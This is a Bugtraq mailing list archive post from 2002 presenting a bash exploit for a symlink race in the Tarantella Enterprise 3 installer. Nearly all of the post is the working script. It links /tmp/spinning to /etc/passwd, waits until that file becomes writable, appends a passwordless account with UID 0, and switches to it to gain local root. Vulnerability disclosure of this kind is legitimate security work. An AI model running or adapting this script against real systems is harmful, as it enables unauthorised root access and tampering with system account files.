Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Exploit for Tarantella Enterprise installation (bid 4115)

From: "Larry W. Cashdollar" <lwc () vapid dhs org>
Date: Sun, 24 Feb 2002 08:59:38 -0500 (EST)

Had some idle time and wrote this, tested under Linux.



#!/bin/bash
#Larry W. Cashdollar  lwc () vapid dhs org
#http://vapid.dhs.org
#Tarantella Enterprise 3 symlink local root Installation exploit
#For educational purposes only.
#tested on Linux.  run and wait.


echo "Creating symlink."

/bin/ln -s /etc/passwd /tmp/spinning

echo "Waiting for tarantella installation."

while true
do
echo -n .
if [ -w /etc/passwd ]
then
        echo "tarexp::0:0:Tarantella Exploit:/:/bin/bash" >> /etc/passwd
        su - tarexp
        exit
fi
done
Previous By Date Next
Previous By Thread Next

Current thread: